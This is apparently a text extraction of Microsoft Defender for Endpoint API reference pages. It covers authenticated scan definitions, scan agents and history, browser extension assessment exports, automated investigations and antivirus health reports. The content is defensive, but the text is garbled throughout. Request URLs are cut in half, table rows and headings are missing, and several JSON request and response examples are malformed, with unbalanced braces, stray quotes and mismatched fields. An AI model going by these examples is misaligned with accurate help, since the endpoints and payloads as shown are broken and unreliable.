Delegated (work or school account) Machine.Read.All Read all scan information.
７ Note
To view data the user needs to have at least the following role permission:
'ViewData' or 'TvmViewData' (See Create and manage roles for more
information)
HTTP request
HTTP
GET /api/DeviceAuthenticatedScanDefinitions
Request headers
ﾉ Expand table
Request body
Empty
Response
If successful, this method returns 200 - OK response code with a list of authenticated
scan definitions.
Example
Request example
HTTP
GET
https://api.securitycenter.microsoft.com/api/DeviceAuthenticatedScanDefiniti
ons
Response example
JSON
{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#DeviceAuthenticatedS
canDefinitions",
"value": [
{
"id": "60c4vv57-asdf-3454-a456-2e45t9d79ec9d",
"scanType": "Windows",
"scanName": "Test Windows scan",
"isActive": true,
"target": "127.0.0.1",
"orgId": "47d21a0c-cccd-45d3-bffa-a93dbc0bfcaa",
"intervalInHours": 1,
"createdBy": "test@contoso.com",
"targetType": "Ip",
"scanAuthenticationParams": {
"@odata.type":
"#microsoft.windowsDefenderATP.api.WindowsAuthParams",
"type": "Kerberos",
"username": "username",
"domain": "password",
"isGmsaUser": true
},
"scannerAgent": {
"id": "47d41a0c-xxx-46d3-bbea-93dbc0bfcaa_1bc268a79eedf14c4b90f77",
"machineId": "eb663asadf345dfg4bc268a79eedf14c4b90f77",
"machineName": "DESKTOP-TEST",
"lastSeen": "2021-12-19T20:29:04.8242449Z",
"AssignedApplicationId": "9E0FA0EB-0A51-4357-9C87-C21BFBE07571",
"ScannerSoftwareVersion": "7.1.1",
"LastCommandExecutionTimestamp": "2021-12-19T20:29:04.8242449Z",
"mdeClientVersion": "10.8295.22621.1195"
},
"latestScan": {
"status": "Fail",
"failureReason": null,
"executionDateTime": "2021-12-19T20:06:55.2295854Z"
},
{
"id": "60c4aa57-ioi3-1290-7ff6-09fr14792a92",
"scanType": "Network",
"scanName": "Network-test-scan",
"isActive": true,
"target": "127.0.0.1",
"orgId": "asdf781a0c-792d-46d3-bbea-a93dbc0bfcaa",
"createdBy": "test@contoso.com",
"targetType": "Ip",
"@odata.type": "#microsoft.windowsDefenderATP.api.SnmpAuthParams"",
type": "AuthPriv",
"authProtocol": "authProtocol",
"authPassword": "authPassword",
"privProtocol": "privProtocol",
"privPassword": "privPassword",
"communityString": "community-string"
},
"scannerAgent": {
"id": "4asdff0c-3344-46d3-bxxe-
a9334rtgfcaa_eb6df89dfdf9032f61eedf14c4b90f77",
"machineId": "eb663a27676kjhj61bc268a79eedf14c4t78u7",
"machineName": "DESKTOP-Test",
"lastSeen": "2022-12-21T14:34:19.5698988Z",
},
"latestScan": {
"status": "Fail",
"executionDateTime": "2022-12-21T14:35:55.6702703Z"
}
},
}
]
}
 Tip
Feedback

Add, update, or delete a scan definition
Article • 09/27/2023
Applies to:


） Important

７ Note
 Tip
API description
API to add, update, or delete an authenticated scan.
Limitations
Rate limitations for this API are 100 calls per minute and 1,500 calls per hour.
You can post on machines last seen according to your configured retention period.
Permissions
how to choose permissions, see Use Defender for Endpoint APIs.
ﾉ Expand table
Application Machine.ReadWrite.All Read and write all scan

information.
Delegated (work or school Machine.Read.Write Read and write all scan

account) information.
７ Note
ViewData or TvmViewData (See Create and manage roles for more
information)
To edit data the user needs to have at least the following role permission:
ManageSecurity (See Create and manage roles for more information)
HTTP request
HTTP
POST
ons
Request headers
ﾉ Expand table
Content-Type string application/json. Required.
Request body
ﾉ Expand table
scanType Enum The type of scan. Possible values are: "Windows",

"Network". Required.
scanName String Name of the scan. Required.
isActive Boolean Status of whether the scan actively running. Required.
target String A comma separated list of targets to scan, either IP

addresses or hostnames. Required.
intervalInHours Int The interval at which the scan runs. Required.
targetType String The target type in the target field. Possible types are "IP
Address" or "Hostname". Default value is IP Address.
Required.
scannerAgent Object machine Id. Required.
scanAuthenticationParams Object An object representing the authentication parameters, see

Authentication parameters object properties for expected
fields. This property is mandatory when creating a new
scan and is optional when updating a scan.
Response
If successful, this method returns 200 - Ok response code and the new or updated scan
definition in the response body.
Example request to add a new scan
Here's an example of a request that adds a new scan.
HTTP
POST
ons
JSON
{
"isActive": true,
"target": "127.0.0.1",
"targetType": "Ip",
"scannerAgent": {
"machineId": "eb663a27ae9d032f61bc268a79eedf14c4b90f77",
},
"@odata.type": "#microsoft.windowsDefenderATP.api.WindowsAuthParams",
"type": "Kerberos",
"isGmsaUser": true
}
}
Example response
JSON
{
"@odata.context":
canDefinitions/$entity",
"id": "289224fb-1686-472c-9751-5555960854ca",
"isActive": true,
"target": "127.0.0.1",
"orgId": "0335a792-18d2-424b-aeed-559567054570",
"createdBy": "username@test.com",
"targetType": "Ip",
"scanAuthenticationParams": null,
"scannerAgent": {
"id": "0335a792-18d2-424b-aeed-559567054570_
eb663a27ae9d032f61bc268a79eedf14c4b90f77",
"lastSeen": "2023-01-04T09:40:03.2787058Z",
"assignedApplicationId": "ae4a5cde-b4a1-4b76-8635-458b2cf15752",
"scannerSoftwareVersion": "7.6.0.0",
"lastCommandExecutionTimestamp": "2023-01-04T09:33:16Z",
},
"latestScan": {
"status": null,
"executionDateTime": null
}
Example request to update a scan

Here's an example of a request that updates a scan.
HTTP
PATCH
ons/289224fb-1686-472c-9751-5555960854ca
JSON
{
"scanName": "Test Update Windows scan",
"isActive": false,
"target": "127.0.0.2,127.0.0.3",
"targetType": "Ip",
"@odata.type": "#microsoft.windowsDefenderATP.api.WindowsAuthParams",
"type": "Kerberos",
"isGmsaUser": true
}
}
Response example
JSON
{
"@odata.context":
"https://localhost:1059/api/$metadata#DeviceAuthenticatedScanDefinitions/$en
tity",
"id": "289224fb-1686-472c-9751-5555960854ca",
"scanName": "Test Update Windows scan",
"isActive": false,
"target": "127.0.0.2,127.0.0.3",
"orgId": "0335a792-18d2-424b-aeed-559567054570",
"createdBy": "userName@microsoft.com",
"targetType": "Ip",
"scanAuthenticationParams": null,
"scannerAgent": {
"id": "0335a792-18d2-424b-aeed-
559567054570_eb663a27ae9d032f61bc268a79eedf14c4b90f77",
"lastSeen": "2023-01-04T09:40:03.2787058Z",
"assignedApplicationId": "ae4a5cde-b4a1-4b76-8635-458b2cf15752",
"scannerSoftwareVersion": "7.6.0.0",
"lastCommandExecutionTimestamp": "2023-01-04T09:33:16Z",
},
"latestScan": {
"status": null,
"executionDateTime": null
}
}
Example request to delete scans

Here's an example of a request that deletes scans.
HTTP
POST
ons/BatchDelete
JSON
{
"ScanDefinitionIds": ["td32f17af-5cc2-4e4e-964a-4c4ef7d216e2", "ab32g20af-
5dd2-4a5e-954a-4c4ef7d216e2"],
}
 Tip
Feedback

Get all scan agents
Article • 09/27/2023
Applies to:


） Important

７ Note
 Tip
API description
Retrieves a list of all scan agents.
Limitations
Permissions
ﾉ Expand table
７ Note
information)
HTTP request
HTTP
GET /api/DeviceAuthenticatedScanAgents
Request headers
ﾉ Expand table

Request body
Empty
Response
If successful, this method returns 200 - OK response code with a list of authenticated
scan agents.
Example
Request example
HTTP
https://api-
us.securitycenter.microsoft.com/api/DeviceAuthenticatedScanAgents
Response example
JSON
{
"@odata.context": "https://api-
us.securitycenter.microsoft.com/api/$metadata#DeviceAuthenticatedScanAgents"
,
"value": [
{
"id": "47df41a0c-asad-4fd6d3-bbea-
a93dbc0bfcaa_4edd75b2407a5b64d704b4e53d74f15",
"machineId": "4ejh675b240118fbehiuiy5b64d704b4e53d15",
"lastSeen": "2022-05-08T12:18:41.538203Z",
"computerDnsName": "TEST_DOMAIN",
},
{
"id": "47d41a0c-1dfd-46d3-bbea-
a93dbc0bfcaa_eb663a27ae9d032f61bc268oiu4c4b90f77",
"machineId": "eb663a27ae9d032sdf9dfd79eedf14c4b90f77",
"lastSeen": "2022-12-19T20:29:04.8242449Z",
"computerDnsName": "TEST_DOMAIN2",
},
]
}
 Tip
Feedback

Get scan agent ID
Article • 09/27/2023
Applies to:


） Important

７ Note
 Tip
API description
Retrieves the details for a specified agent by its ID.
Limitations
Permissions
ﾉ Expand table
７ Note
information)
HTTP request
HTTP
GET /api/DeviceAuthenticatedScanAgents
Request headers
ﾉ Expand table

Request body
Empty
Response
If successful, this method returns 200 - OK response code with the details of the
specified agent.
Example request
HTTP
GET
https://api.securitycenter.microsoft.com/api/DeviceAuthenticatedScanAgents/7
f3d76a6976818553e996875dc91f55df6b26625
Response example
JSON
{
"@odata.context":
canAgents/$entity",
"value": [
{
"id": "47df41a0c-asad-4fd6d3-bbea-
a93dbc0bfcaa_4edd75b2407a5b64d704b4e53d74f15",
"machineId": "4ejh675b240118fbehiuiy5b64d704b4e53d15",
"lastSeen": "2022-05-08T12:18:41.538203Z",
"computerDnsName": "TEST_DOMAIN",
},
]
}
 Tip
Feedback

Get scan history by definition
Article • 09/27/2023
Applies to:


） Important

７ Note
 Tip
API description
Retrieves a list of the scan history by definitions.
Supports OData operations.

$top with max value of 4096. Returns the number of sessions specified in the
request.
$skip with a default value of 0. Skips the number of sessions specified in the
request.
For an example of OData operation usage, see example $top request.
Limitations
Permissions
ﾉ Expand table
７ Note
information)
HTTP request
HTTP
POST api/DeviceAuthenticatedScanDefinitions/GetScanHistoryByScanDefinitionId
Request headers
ﾉ Expand table
Request body
ﾉ Expand table
ScanDefinitionIds String The scan Id. Required.
Response
If successful, this method returns 200 - OK response code with a list of the scan history
by definition.
Example request
HTTP
POST
ons/GetScanHistoryByScanDefinitionId
JSON
{
"ScanDefinitionIds": ["4ad8d463-6b3a-4894-b42a-a2de9ea0a8ae", "60c4aa57-
c573-4488-8d18-230914792a92", "c6220f67-2cad-4ba3-a2fa-7ded6384da56"]
}
Response example
JSON
{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/DeviceAuthenticatedScanDefinit
ions/GetScanHistoryByScanDefinitionId",
"value": [
{
"ScanDefinitionIds": "4ad8d463-6b3a-4894-b42a-a2de9ea0a8ae",
"LastScanned": "2022-12-20T11:14:24.5561791Z",
"ScanStatus": "Partial Success",
"ScannerId": "625431694b7d2ca9d07e77ca1b029ef216bebb6d"
},
{
"ScanDefinitionIds": "60c4aa57-c573-4488-8d18-230914792a92",
"LastScanned": "2022-11-17T15:13:24.5561791Z",
},
{
"ScanDefinitionIds": "c6220f67-2cad-4ba3-a2fa-7ded6384da56",
"LastScanned": "2022-11-10T18:15:24.5561791Z",
},
]
}
Example $top request

Here's an example of a request that returns only 1 session.
HTTP
POST
ons/GetScanHistoryByScanDefinitionId?$top=1
$top Response example

JSON
{
"@odata.context":
ions/GetScanHistoryByScanDefinitionId",
"value": [
{
"LastScanned": "2022-12-20T11:14:24.5561791Z",
},
]
}
Feedback

Get scan history by session
Article • 02/22/2024
Applies to:


） Important

７ Note
 Tip
API description
Retrieves a list of the scan history by session.
Limitations
Permissions
ﾉ Expand table
７ Note
ViewData or TvmViewData . For more information, see Create and manage
roles.
HTTP request
HTTP
POST /api/DeviceAuthenticatedScanDefinitions/GetScanHistoryBySessionId
Request headers
ﾉ Expand table
Authorization string Bearer {token}. Required.

Name
Content-Type Type
string Description
application/json. Required.
Request body
ﾉ Expand table
SessionIds String The session Id. Required.
Response
If successful, this method returns 200 - OK response code with a list of the scan history
for a session.
Example request
HTTP
POST
ons/GetScanHistoryBySessionId
JSON
{
"SessionIds": ["01decc497f4b4ec49a5fc4e12597f8c8"]
}
Response example
JSON
{
"@odata.context":
ions/GetScanHistoryBySessionId",
"value": [
{
"orgId": "asdf781a0c-792d-46d3-bbea-a93dbc0bfcaa",
"SessionIds": "01decc497f4b4ec49a5fc4e12597f8c8",
"NumberOfSuccessfullyScannedTargets": 3,
"NumberOfTargets": 3,
"ScanStatus": "Success",
"LastScanned": "2022-12-19T15:14:24.5561791Z",
"ListScannedTargets": {
"Ip": "127.0.0.1",
"Hostname": "DESKTOP-Test",
"ScannedDeviceDescription": "Network device",
"ErrorMessage": "",
"ScanDuration": "00:08:30",
},
{
"Ip": "127.0.0.2",
"Hostname": "DESKTOP-Test2",
"ScannedDeviceDescription": "Network device 2",
"ErrorMessage": "",
},
{
"Ip": "127.0.0.3",
"Hostname": "DESKTOP-Test3",
"ScannedDeviceDescription": "Network device 3",
"ErrorMessage": "",
},
}
]
}
 Tip
Feedback

Export browser extensions assessment
per device
Article • 09/27/2023
Applies to:

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial. .

Returns all known installed browser extensions and their details for all devices, on a per-
device basis.
Different API calls get different types of data. Because the amount of data can be large,
there are two ways it can be retrieved:
Export browser extensions assessment JSON response The API pulls all data in
your organization as Json responses. This method is best for small organizations
with less than 100-K devices. The response is paginated, so you can use the
@odata.nextLink field from the response to fetch the next results.
Export browser extensions assessment via files This API solution enables pulling
larger amounts of data faster and more reliably. So, it's recommended for large
organizations, with more than 100-K devices. This API pulls all data in your
like.
Data that is collected (using either Json response or via files) is the current snapshot of
７ Note
1. Export browser extensions assessment (JSON

response)

This API response contains all the data for installed browser extensions per device.
Returns a table with an entry for every unique combination of DeviceId, BrowserName,
ExtensionId.
1.1.1 Limitations

1.2 Permissions
ﾉ Expand table


1.3 URL
HTTP
GET /api/Machines/BrowserExtensionsInventoryByMachine
1.4 Parameters
doesn't pull all the data)
1.5 Properties
７ Note
Each record is approximately 0.5KB of data. You should take this into account
columns.
ﾉ Expand table
BrowserName string Name of the browser where the extension is installed.
DeviceId string Unique identifier for the device.
ExtensionDescription string Description of a specific browser extension.
ExtensionId string Unique identifier for a specific browser extension.
ExtensionName string Name of a specific browser extension.
ExtensionRisk string The highest risk level generated by the browser extension.
Possible values are: "None", "Low", "Medium", "High",
"Critical".
ExtensionVersion string Version number of a specific browser extension.
IsActivated Boolean Indicates whether a browser extension is active.
RbacGroupId integer The role-based access control (RBAC) group ID.
RbacGroupName string The role-based access control (RBAC) group. If this device is
not assigned to any RBAC group, the value will be
"Unassigned." If the organization doesn't contain any RBAC
groups, the value will be "None."
InstallationTime string The time the browser extension was installed.
Permissions Array[string] The set of permissions requested by a specific browser

extension.
1.6 Examples
HTTP
GET
https://api.securitycenter.microsoft.com/api/Machines/BrowserExtensionsInven
toryByMachine?pageSize=5 &sinceTime=2021-05-19T18%3A35%3A49.924Z
JSON
{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#Collection(contoso.w
indowsDefenderATP.api.AssetSoftware)",
"value": [
{
"DeviceId": "1c32162b42e9efa1f5de42f951775f22f435c997",
"DeviceName":
"computerpii_1363c2e016e2225cb03974df58f14e6968067aa8.domainpii_f260e982985f
7e8eee198b4332e0ae5b2a069cd6.corp.microsoft.com",
"RbacGroupId": 86,
"RbacGroupName": "UnassignedGroup",
"InstallationTime": "2022-05-26T18:46:27.000Z",
"BrowserName": "chrome",
"ExtensionId": "dkpejdfnpdkhifgbancbammdijojoffk",
"ExtensionName": "Logitech Smooth Scrolling",
"ExtensionDescription": "Buttery-smooth scrolling for Logitech
mice and touchpads.",
"ExtensionVersion": "6.65.62",
"ExtensionRisk": "High",
"IsActivated": true,
"Permissions": [
{
"Id": "tabs",
"IsRequired": true,
"Risk": "High"
},
{
"Id": http://*/*,
"IsRequired": true,
"Risk": "High"
},
{
"Id": https://*/*,
"IsRequired": true,
"Risk": "High"
}
]
}
],
"@odata.nextLink":
"https://api.securitycenter.microsoft.com/api/Machines/BrowserExtensionsInve
ntoryByMachine?
pagesize=5&$skiptoken=eyJFeHBvcnREZWZpbml0aW9uIjp7IlRpbWVQYXRoIjoiMjAyMS0wMS
0yNS8wMjAwLyJ9LCJFeHBvcnRGaWxlSW5kZXgiOjAsIkxpbmVTdG9wcGVkQXQiOjV9"
}
2. Export browser extension assessment (via

files)

This API response contains all the data for installed browser extensions per device.
Returns a table with an entry for every unique combination of DeviceId, BrowserName,
ExtensionId.
2.1.1 Limitations
2.2 Permissions
ﾉ Expand table


2.3 URL
HTTP
GET /api/machines/browserextensionsinventoryExport
2.4 Parameters
(Maximum 24 hours)
2.5 Properties
７ Note

The download URLs are only valid for 3 hours. Otherwise you can use the
parameter.
ﾉ Expand table
Export files array[string] A list of "

download [Https://tvmexportstrstgeus.blob.core.windows.net/tvm-
URLs for export...1",

files holding "https://tvmexportstrstgeus.blob.core.windows.net/tvm-
the current export...2"]
snapshot of
the
organization

that the
export was
generated.
2.6 Examples
HTTP
GET
https://api.securitycenter.microsoft.com/api/machines/browserextensionsinven
toryExport
JSON
{
"@odata.context":
"exportFiles": [
01-11/1101/BrowserExtensions/json/OrgId=12345678-195f-4223-9c7a-
99fb420fd000/part-00393-e423630d-4c69-4490-8769-a4f5468c4f25.c000.json.gz?
sv=2019-12-12&st=2021-01-11T11%3A55%3A51Z&se=2021-01-
11T14%3A55%3A51Z&sr=b&sp=r&sig=...",
sv=2019-12-12&st=2021-01-11T11%3A55%3A51Z&se=2021-01-
11T14%3A55%3A51Z&sr=b&sp=r&sig=...",
sv=2019-12-12&st=2021-01-11T11%3A55%3A51Z&se=2021-01-
11T14%3A55%3A51Z&sr=b&sp=r&sig=..."
],
}
See also
Get browser extensions permission info
Browser extensions assessment
Other related
 Tip
Feedback

Get browser extensions permission
information
Article • 09/27/2023
Applies to:


７ Note
 Tip
） Important

API description
Retrieves a list of all the permissions requested by a specific browser extension. This is a
static data description and would mainly be used to enhance the data returned by the
Export browser extensions assessment API.
By combining these APIs you'll be able to see a description of the permissions requested
by the browser extensions that come up in the Export browser extensions assessment
results.

$filter on: id , name , description , cvssV3 , publishedOn , severity , and updatedOn
properties.
$top with max value of 10,000.
$skip .
Permissions
ﾉ Expand table


HTTP request
HTTP
GET api/browserextensions/permissionsinfo
Request headers
ﾉ Expand table
Request body
Empty
Response
If successful, this method returns 200 OK with the list of all permissions requested by a
browser extension in the body.
Example
Request example
HTTP
GET
https://api.securitycenter.microsoft.com/api/browserextensions/permissionsin
fo
Response example
JSON
{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#BrowserExtension",
"value": [
{
"value": [
{
"key": "audioCapture",
"permissionName": "Capture audio from attached mic or webcam",
"description": "Capture audio from attached mic or webcam. Could be
used to listen in on use."
},
{
"key": "app.window.fullscreen.overrideEsc",
"permissionName": "Prevent escape button from exiting fullscreen",
"description": "Can prevent escape button from exiting fullscreen."
},
{
"key": "browsingData",
"permissionName": "Clear browsing data",
"description": "Clears browsing data which could result in a
forensics/logging issues."
},
{
"key": "content_security_policy",
"permissionName": "Can manipulate default Content Security Policy
(CSP)",
"description": "CSP works as a block/allow listing mechanism for
resources loaded or executed by your extensions. Can manipulate default
CSP."
}
]
}
]
See also
Get browser extensions permission info
Browser extensions assessment
Other related
 Tip
Feedback

Investigation resource type
Article • 09/27/2023
Applies to:

７ Note
 Tip
Represent an Automated Investigation entity in Defender for Endpoint.
For more information, see Overview of automated investigations.
Methods
ﾉ Expand table
List Investigations Investigation collection Get collection of Investigation
Get single Investigation Investigation entity Gets single Investigation entity.
Start Investigation Investigation entity Starts Investigation on a device.

Properties
ﾉ Expand table
ID String Identity of the investigation entity.
startTime DateTime The date and time when the investigation was created.
Nullable
endTime DateTime The date and time when the investigation was completed.
Nullable
cancelledBy String The ID of the user/application that canceled that investigation.
State Enum The current state of the investigation. Possible values are:
'Unknown', 'Terminated', 'SuccessfullyRemediated', 'Benign',
'Failed', 'PartiallyRemediated', 'Running', 'PendingApproval',
'PendingResource', 'PartiallyInvestigated', 'TerminatedByUser',
'TerminatedBySystem', 'Queued', 'InnerFailure',
'PreexistingAlert', 'UnsupportedOs', 'UnsupportedAlertType',
'SuppressedAlert'.
statusDetails String Additional information about the state of the investigation.
machineId String The ID of the device on which the investigation is executed.
computerDnsName String The name of the device on which the investigation is executed.
triggeringAlertId String The ID of the alert that triggered the investigation.
Json representation
JSON
{
"id": "63004",
"startTime": "2020-01-06T13:05:15Z",
"endTime": null,
"state": "Running",
"cancelledBy": null,
"statusDetails": null,
"machineId": "e828a0624ed33f919db541065190d2f75e50a071",
"computerDnsName": "desktop-test123",
"triggeringAlertId": "da637139127150012465_1011995739"
}
 Tip
Feedback

List Investigations API
Article • 02/22/2024
Applies to:

７ Note
 Tip
API description
Retrieves a collection of Investigations.
The OData's $filter query is supported on: startTime , id , state , machineId , and
triggeringAlertId properties.
$stop with max value of 10,000

$skip
See examples at OData queries with Microsoft Defender for Endpoint

Limitations
Permissions
ﾉ Expand table
７ Note
The user needs to have at least the following role permission: View Data . For
more information, see Create and manage roles for more information.
HTTP request
HTTP
GET https://api.securitycenter.microsoft.com/api/investigations
Request headers
ﾉ Expand table
Request body
Empty
Response
If successful, this method returns 200, Ok response code with a collection of
Investigations entities.
Example
Request example
Here's an example of a request to get all investigations:
HTTP
GET https://api.securitycenter.microsoft.com/api/investigations
Response example
Here's an example of the response:
JSON
{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#Investigations",
"value": [
{
"id": "63017",
"startTime": "2020-01-06T14:11:34Z",
"endTime": null,
"state": "Running",
"cancelledBy": null,
"statusDetails": null,
"machineId": "a69a22debe5f274d8765ea3c368d00762e057b30",
"computerDnsName": "desktop-gtrcon0",
"triggeringAlertId": "da637139166940871892_-598649278"
}
...
]
}
 Tip
Feedback

Get Investigation API
Article • 12/11/2023
Applies to:

７ Note
 Tip
API description
Retrieves specific Investigation by its ID.
ID can be the investigation ID or the investigation triggering alert ID.
Limitations
Permissions
ﾉ Expand table
７ Note
HTTP request
HTTP
GET https://api.securitycenter.microsoft.com/api/investigations/{id}
Request headers
ﾉ Expand table
Request body
Empty
Response
If successful, this method returns 200, Ok response code with an Investigations entity.
 Tip
Feedback

Start Investigation API
Article • 09/27/2023
Applies to:

７ Note
 Tip
API description
Start automated investigation on a device.
See Overview of automated investigations for more information.
Limitations
1. Rate limitations for this API are 50 calls per hour.
Requirements for AIR

Your organization must have Defender for Endpoint (see Minimum requirements for
Currently, AIR only supports the following OS versions:
Windows Server 2019

Windows Server 2022
Windows 11
Permissions
ﾉ Expand table
７ Note
The user needs to have at least the following role permission: 'Active
remediation actions' (See Create and manage roles for more information)
HTTP request
HTTP
POST https://api.security.microsoft.com/api/machines/{id}/startInvestigation
Request headers
ﾉ Expand table
Request body
ﾉ Expand table
Comment String Comment to associate with the action. Required.
Response
If successful, this method returns 201 - Created response code and Investigation in the
response body.
Example
Request
https
POST
https://api.security.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2932e418
702b84d0cc07/startInvestigation
JSON
{
"Comment": "Test investigation"
}
 Tip
Feedback

Export device antivirus health details API
Article • 09/27/2023
Applies to:

７ Note
 Tip
） Important

Export device antivirus health details API

description
Retrieves a list of Microsoft Defender Antivirus device health details. This API has different
API calls (methods) to get different types of data. Because the amount of data can be
large, there are two ways it can be retrieved:
paginated, so you can use the @odata.nextLink field from the response to fetch the
next results.
reliably. So, it's recommended for large organizations, with more than 100-K devices.
This API pulls all data in your organization as download files. The response contains
URLs to download all the data from Azure Storage. This API enables you to
download all your data from Azure Storage as follows:
） Important
Health API via files is currently only available in public preview.
Advanced Hunting custom query is currently only available in public preview, even if
the queries are still visible.
For information about using the Device health and antivirus compliance reporting
tool in the Microsoft 365 Security dashboard, see: Device health and antivirus report
in Microsoft Defender for Endpoint.
1.1 Export device antivirus health details API methods
ﾉ Expand table
Microsoft Defender Returns a table with The API pulls all data in your organization as JSON
Antivirus health per an entry for every responses. This method is best for small
device collection. unique combination organizations with less than 100-K devices. The
See: 1.2 Export of DeviceId, response is paginated, so you can use the
device antivirus ConfigurationId. @odata.nextLink field from the response to fetch
health details API the next results.
properties (JSON
response)
Microsoft Defender Returns a table with This API solution enables pulling larger amounts
Antivirus health per an entry for every of data faster and more reliably. So, it's
device collection. unique combination recommended for large organizations, with more
See: 1.3 Export of DeviceId, than 100-K devices. This API pulls all data in your
device antivirus ConfigurationId. organization as download files. The response
health details API contains URLs to download all the data from
properties (via files) Azure Storage. This API enables you to download
all your data from Azure Storage as follows:
1. Call the API to get a list of download URLs

with all your organization data.
2. Download all the files using the download
URLs and process the data as you like.
1.2 Limitations
Maximum page size: 200,000
Rate limitations for this API: 30 calls per minute and 1,000 calls per hour
1.3 Export device antivirus health details API properties

(JSON response)
７ Note

property ID. When running this API, the resulting output will not necessarily be
returned in the same order listed in this table.
Note that rbacgroupname and Id are not supported filter operators.
can be temporary and might be removed; use only the documented columns.
ﾉ Expand table
avEngineUpdateTime DateTimeOffset Datetime "2022-08-04T12:44:02Z"

when AV
engine was
last
updated on
device
avEngineVersion String Antivirus "1.1.19400.3"

engine
version
avIsEngineUpToDate String Up-to-date "True", "False", "Unknown"

status of AV
engine
avIsPlatformUpToDate String Up-to-date "True", "False", "Unknown"

status of AV
platform
avIsSignatureUpToDate String Up-to-date "True", "False", "Unknown"

status of AV
signature
avMode String Antivirus Each mode will be a string typed integer value
mode. ranging from 0 to 5. Refer to the mapping
below to see its value's meaning:
'' = Other
'0' = Active
'1' = Passive
'2' = Disabled
'3' = Other
'4' = EDRBlocked
'5' = PassiveAudit
avPlatformUpdateTime DateTimeOffset Datetime "2022-08-04T12:44:02Z"

when AV
platform
was last
updated on
device
avPlatformVersion String Antivirus "4.18.2203.5"

platform
version
avSignaturePublishTime DateTimeOffset Datetime "2022-08-04T12:44:02Z"

when AV
security
intelligence
build was
released
avSignatureUpdateTime DateTimeOffset Datetime "2022-08-04T12:44:02Z"

when AV
security
intelligence
was last
updated on
device
avSignatureVersion String Antivirus "1.371.1323.0"

security
intelligence
version
computerDnsName String DNS name "SampleDns"
dataRefreshTimestamp DateTimeOffset Datetime "2022-08-04T12:44:02Z"

when data
is refreshed
for this
report
fullScanError String Error codes "0x80508023"

from full
scan
fullScanResult String Full scan "Completed"

result of "Canceled"
this device "Failed"
fullScanTime DateTimeOffset Datetime "2022-08-04T12:44:02Z"

when full
scan has
completed
id String Machine "30a8fa2826abf24d24379b23f8a44d471f00feab"

GUID
lastSeenTime DateTimeOffset Last seen "2022-08-04T12:44:02Z"

datetime of
this
machine
machineId String Machine "30a8fa2826abf24d24379b23f8a44d471f00feab"

GUID
osKind String Operating "windows", "mac", "linux"

system kind
osPlatform String Operating Windows 10, macOs

system
major
version
name
osVersion String Operating 10.0.18363.1440, 12.4.0.0

system
version
quickScanError String Error codes "0x80508023"

from quick
scan
quickScanResult String Quick scan "Completed"

result of "Canceled"
this device "Failed"
quickScanTime DateTimeOffset Datetime "2022-08-04T12:44:02Z"

when quick
scan has
completed
rbacGroupId Long Device 712

group ID
that this
machine
belongs to
rbacGroupName String Name of "SampleGroup"

device
group that
this
machine
belongs to
1.4 Export device antivirus health details API properties

(via files)
） Important
Information in this section relates to prereleased product which may be substantially

７ Note

parameter.
Each record is approximately 1KB of data. You should take this into account
Some additional columns might be returned in the response. These columns are
temporary and might be removed, please use only the documented columns.
ﾉ Expand table
Export files array[string] A list of ["https://tvmexportstrstgeus.blob.core.windows.net/tvm-

download export...1",
URLs for files "https://tvmexportstrstgeus.blob.core.windows.net/tvm-
holding the export...2"]
current
snapshot of
the
organization.
GeneratedTime String The time 2022-05-20T08:00:00Z

that the
export was
generated.
７ Note
In each of the Export files a property "DeviceGatheredInfo" containing the data about
Antivirus information can be found. Each of its attributes can provide you with
information on the device's health and its status.
See also
Device health and compliance reporting
 Tip
Feedback

Article • 09/27/2023
Applies to:

７ Note
 Tip
） Important

This API has two methods to retrieve Microsoft Defender Antivirus device antivirus
health details:
Method one: 1 Export health reporting (JSON response) The method pulls all data
in your organization as JSON responses. This method is best for small
organizations with less than 100-K devices. The response is paginated, so you can
use the @odata.nextLink field from the response to fetch the next results.
Method two: 2 Export health reporting (via files) This method enables pulling
larger amounts of data faster and more reliably. So, it's recommended for large
organizations, with more than 100-K devices. This API pulls all data in your
like.
save the data in their own data storages. See Export device health details API methods
and properties.
） Important
Health API via files is currently only available in public preview.
Advanced Hunting custom query is currently only available in public preview, even
if the queries are still visible.
） Important
７ Note
For information about using the Device health and antivirus compliance reporting
tool in the Microsoft 365 Security dashboard, see: Device health and antivirus
compliance report in Microsoft Defender for Endpoint.
1 Export health reporting (JSON response)

This API retrieves a list of Microsoft Defender Antivirus device antivirus health details.
Returns a table with an entry for every unique combination of:
DeviceId
Device name
AV mode
Up-to-date status
Scan results
1.1.1 Limitations
maximum page size is 200,000

OData supported operators

$filter on: machineId , computerDnsName , osKind , osPlatform , osVersion , avMode ,
avSignatureVersion , avEngineVersion , avPlatformVersion , quickScanResult ,
quickScanError , fullScanResult , fullScanError , avIsSignatureUpToDate ,
avIsEngineUpToDate , avIsPlatformUpToDate , rbacGroupId

$skip
） Important
Note that rbacgroupname and Id are not supported filter operators.
1.2 Permissions
ﾉ Expand table
Delegated (work or school account) Machine.Read 'Read machine information'

1.3 URL (HTTP request)
HTTP
URL: GET: /api/deviceavinfo
1.3.1 Request headers
ﾉ Expand table
1.3.2 Request body

Empty
1.3.3 Response
If successful, this method returns 200 OK with a list of device health details.
1.4 Parameters
Default page size is 20
1.5 Properties
See: 1.3 Export device antivirus health details API properties (JSON response)
1.6 Example
Request example
Here's an example request:
HTTP
GET https://api.securitycenter.microsoft.com/api/deviceavinfo
Response example
Here's an example response:
JSON
@odata.context:
"https://api.securitycenter.microsoft.com/api/$metadata#DeviceAvInfo",
"value": [{
"id": "Sample Guid",
"machineId": "Sample Machine Guid",
"computerDnsName": "appblockstg1",
"osKind": "windows",
"osVersion": "10.0.19044.1865",
"avMode": "0",
"avSignatureVersion": "1.371.1279.0",
"avEngineVersion": "1.1.19428.0",
"avPlatformVersion": "4.18.2206.108",
"lastSeenTime": "2022-08-02T19:40:45Z",
"quickScanResult": "Completed",
"quickScanError": "",
"quickScanTime": "2022-08-02T18:40:15.882Z",
"fullScanResult": "",
"fullScanError": "",
"fullScanTime": null,
"dataRefreshTimestamp": "2022-08-02T21:16:23Z",
"avEngineUpdateTime": "2022-08-02T00:03:39Z",
"avSignatureUpdateTime": "2022-08-02T00:03:39Z",
